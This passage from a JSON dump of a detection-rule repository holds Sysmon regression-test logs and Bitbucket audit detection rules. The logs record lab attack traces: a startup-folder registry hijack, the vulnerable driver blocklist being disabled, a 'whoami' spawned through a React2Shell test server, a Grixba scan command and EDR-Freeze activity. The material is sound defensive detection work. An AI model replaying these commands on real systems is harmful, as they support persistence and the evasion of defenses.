\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n      \"Details\": \"C:\\\\Test\\\\calc.exe\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/info.yml",
    "content": "id: 0a756043-828b-47af-9863-3eeb6939c54d\ndescription: N/A\ndate: 2026-01-05\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 9c226817-8dc9-46c2-a58d-66655aafd7dc\n      title: Modify User Shell Folders Startup Value\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-23T02:22:32.926365Z\"\n        }\n      },\n      \"EventRecordID\": 90931,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3320,\n          \"ThreadID\": 4216\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-12-23 02:22:32.922\",\n      \"ProcessGuid\": \"0197231E-FCE8-6949-4010-000000000D00\",\n      \"ProcessId\": 17728,\n      \"Image\": \"C:\\\\WINDOWS\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\CI\\\\Config\\\\VulnerableDriverBlocklistEnable\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/info.yml",
    "content": "id: 329ecd6e-38a9-4bab-a75f-66854af61019\ndescription: N/A\ndate: 2025-12-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: d526c60a-e236-4011-b165-831ffa52ab70\n      title: Windows Vulnerable Driver Blocklist Disabled\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 16,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 16,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:33:08.092105Z\"\n        }\n      },\n      \"EventRecordID\": 11738,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 8932,\n          \"ThreadID\": 1540\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-21-3960063115-309473240-3247002503-500\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"UtcTime\": \"2025-10-24 23:33:08.088\",\n      \"Configuration\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\sysmonconfig-trace.xml\",\n      \"ConfigurationFileHash\": \"SHA256=B977839264146AFDE215D41182F78F153F9198EBA8EF0B88426239C33FBDA945\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/sysmon/sysmon_config_modification/info.yml",
    "content": "id: 54f3ccdd-e1f9-4b9f-8dda-b1bdcb13d6ba\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 8ac03a65-6c84-4116-acad-dc1558ff7a77\n      title: Sysmon Configuration Change\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-06T21:11:02.649150Z\"\n        }\n      },\n      \"EventRecordID\": 67583,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3904,\n          \"ThreadID\": 4272\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-06 21:11:02.632\",\n      \"ProcessGuid\": \"0197231E-9BE6-6934-5301-000000000B00\",\n      \"ProcessId\": 3412,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.26100.2454 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /d /s /c \\\"whoami\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\CVE-2025-55182-main\\\\CVE-2025-55182-main\\\\test-server\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-99CA-6934-A8EB-010000000000\",\n      \"LogonId\": \"0x1eba8\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF\",\n      \"ParentProcessGuid\": \"0197231E-9B6B-6934-2B01-000000000B00\",\n      \"ParentProcessId\": 1092,\n      \"ParentImage\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\bun-node-274e01c73\\\\node.exe\",\n      \"ParentCommandLine\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\bun-node-274e01c73\\\\node.exe C:\\\\Users\\\\xodih\\\\Downloads\\\\CVE-2025-55182-main\\\\CVE-2025-55182-main\\\\test-server\\\\node_modules\\\\next\\\\dist\\\\server\\\\lib\\\\start-server.js\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/info.yml",
    "content": "id: b6598f67-233f-4e7e-839d-2379a44fc63e\ndescription: N/A\ndate: 2025-12-06\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 271de298-cc0e-4842-acd8-079a0a99ea65\n      title: Suspicious Child Process from Node.js Server - React2Shell\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.evtx\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-26T05:11:27.927693Z\"\n        }\n      },\n      \"EventRecordID\": 142649,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-26 05:11:27.908\",\n      \"ProcessGuid\": \"0197231E-8BFF-6926-1308-000000000D00\",\n      \"ProcessId\": 10116,\n      \"Image\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\GRB_NET.exe\",\n      \"FileVersion\": \"1.1.3.0\",\n      \"Description\": \"GRB_NT\",\n      \"Product\": \"GRB_NT\",\n      \"Company\": \"Zabbix\",\n      \"OriginalFileName\": \"GRB_NET.exe\",\n      \"CommandLine\": \"GRB_NET.exe  -m:scan -i:f -d:list.txt\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-645E-3B0000000000\",\n      \"LogonId\": \"0x3b5e64\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=88DF27B6E794E3FD5F93F28B1CA1D3D0,SHA256=F8810179AB033A9B79CD7006C1A74FBCDE6ED0451C92FBB8C7CE15B52499353A,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\",\n      \"ParentProcessGuid\": \"0197231E-A1BD-6925-C705-000000000D00\",\n      \"ParentProcessId\": 7972,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/info.yml",
    "content": "id: 78005a80-bbfd-475c-a4b2-f562a7b0fecf\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: af688c76-4ce4-4309-bfdd-e896f01acf27\n      title: Grixba Malware Reconnaissance Activity\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.evtx\n"
  },
  {
    "path": "regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 7,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 7,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:40:10.165324Z\"\n        }\n      },\n      \"EventRecordID\": 571146,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4272\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:40:10.132\",\n      \"ProcessGuid\": \"0197231E-005A-6928-A50B-000000000D00\",\n      \"ProcessId\": 4460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n      \"ImageLoaded\": \"C:\\\\Windows\\\\System32\\\\dbgcore.dll\",\n      \"FileVersion\": \"10.0.26100.7019 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Core Debugging Helpers\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DBGCORE.DLL\",\n      \"Hashes\": \"SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C\",\n      \"Signed\": \"true\",\n      \"Signature\": \"Microsoft Windows\",\n      \"SignatureStatus\": 
\"Valid\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml",
    "content": "id: 63b16abe-2d5c-4a2f-b0ae-f1bc4580e40c\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\n      title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.evtx\n"
  },
  {
    "path": "rules/README.md",
    "content": "TBD"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml",
    "content": "title: Bitbucket Full Data Export Triggered\nid: 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8\nstatus: test\ndescription: Detects when full data export is attempted.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.collection\n    - attack.t1213.003\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Data pipeline'\n        auditType.action: 'Full data export triggered'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: high\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml",
    "content": "title: Bitbucket Global Permission Changed\nid: aac6c4f4-87c7-4961-96ac-c3fd3a42c310\nstatus: test\ndescription: Detects global permissions change activity.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Permissions'\n        auditType.action:\n            - 'Global permission remove request'\n            - 'Global permission removed'\n            - 'Global permission granted'\n            - 'Global permission requested'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml",
    "content": "title: Bitbucket Global Secret Scanning Rule Deleted\nid: e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05\nstatus: test\ndescription: Detects Bitbucket global secret scanning rule deletion activity.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Global administration'\n        auditType.action: 'Global secret scanning rule deleted'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml",
    "content": "title: Bitbucket Global SSH Settings Changed\nid: 16ab6143-510a-44e2-a615-bdb80b8317fc\nstatus: test\ndescription: Detects Bitbucket global SSH access configuration changes.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1021.004\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Global administration'\n        auditType.action: 'SSH settings changed'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml",
    "content": "title: Bitbucket Audit Log Configuration Updated\nid: 6aa12161-235a-4dfb-9c74-fe08df8d8da1\nstatus: test\ndescription: Detects changes to the bitbucket audit log configuration.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Auditing'\n        auditType.action: 'Audit log configuration updated'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml",
    "content": "title: Bitbucket Project Secret Scanning Allowlist Added\nid: 42ccce6d-7bd3-4930-95cd-e4d83fa94a30\nstatus: test\ndescription: Detects when a secret scanning allowlist rule is added for projects.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Projects'\n        auditType.action: 'Project secret scanning allowlist rule added'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: low\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml",
    "content": "title: Bitbucket Secret Scanning Exempt Repository Added\nid: b91e8d5e-0033-44fe-973f-b730316f23a1\nstatus: test\ndescription: Detects when a repository is exempted from secret scanning feature.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Repositories'\n        auditType.action: 'Secret scanning exempt repository added'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: high\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml",
    "content": "title: Bitbucket Secret Scanning Rule Deleted\nid: ff91e3f0-ad15-459f-9a85-1556390c138d\nstatus: test\ndescription: Detects when secret scanning rule is deleted for the project or repository.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category:\n            - 'Projects'\n            - 'Repositories'\n        auditType.action:\n            - 'Project secret scanning rule deleted'\n            - 'Repository secret scanning rule deleted'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: low\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml",
    "content": "title: Bitbucket Unauthorized Access To A Resource\nid: 7215374a-de4f-4b33-8ba5-70804c9251d3\nstatus: test\ndescription: Detects unauthorized access attempts to a resource.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.resource-development\n    - attack.t1586\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Security'\n        auditType.action: 'Unauthorized access to a resource'\n    condition: selection\nfalsepositives:\n    - Access attempts to non-existent repositories or due to outdated plugins. Usually \"Anonymous\" user is reported in the \"author.name\" field in most cases.\nlevel: critical\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml",
    "content": "title: Bitbucket Unauthorized Full Data Export Triggered\nid: 34d81081-03c9-4a7f-91c9-5e46af625cde\nstatus: test\ndescription: Detects when full data export is attempted an unauthorized user.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.collection\n    - attack.resource-development\n    - attack.t1213.003\n    - attack.t1586\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Data pipeline'\n        auditType.action: 'Unauthorized full data export triggered'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml",
    "content": "title: Bitbucket User Details Export Attempt Detected\nid: 5259cbf2-0a75-48bf-b57a-c54d6fabaef3\nstatus: test\ndescription: Detects user data export activity.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.collection\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.t1213\n    - attack.t1082\n    - attack.t1591.004\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Users and groups'\n        auditType.action:\n            - 'User permissions export failed'\n            - 'User permissions export started'\n            - 'User permissions exported'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml",
    "content": "title: Bitbucket User Login Failure\nid: 70ed1d26-0050-4b38-a599-92c53d57d45a\nstatus: test\ndescription: |\n    Detects user authentication failure events.\n    Please note that this rule can be noisy and it is recommended to use with correlation based on \"author.name\" field.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Authentication'\n        auditType.action: 'User login failed'\n    condition: selection\nfalsepositives:\n    - Legitimate user wrong password attempts.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml",
    "content": "title: Bitbucket User Login Failure Via SSH\nid: d3f90469-fb05-42ce-b67d-0fded91bbef3\nstatus: test\ndescription: |\n    Detects SSH user login access failures.\n    Please note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html\n    - https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.t1021.004\n    - attack.t1110\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Authentication'\n        auditType.action: 'User login failed(SSH)'\n    condition: selection\nfalsepositives:\n    - Legitimate user wrong password attempts.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml",
    "content": "title: Bitbucket User Permissions Export Attempt\nid: 87cc6698-3e07-4ba2-9b43-a85a73e151e2\nstatus: test\ndescription: Detects user permission data export attempt.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.reconnaissance\n    - attack.collection\n    - attack.discovery\n    - attack.t1213\n    - attack.t1082\n    - attack.t1591.004\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Users and groups'\n        auditType.action:\n            - 'User details export failed'\n            - 'User details export started'\n            - 'User details exported'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/django/appframework_django_exceptions.yml",
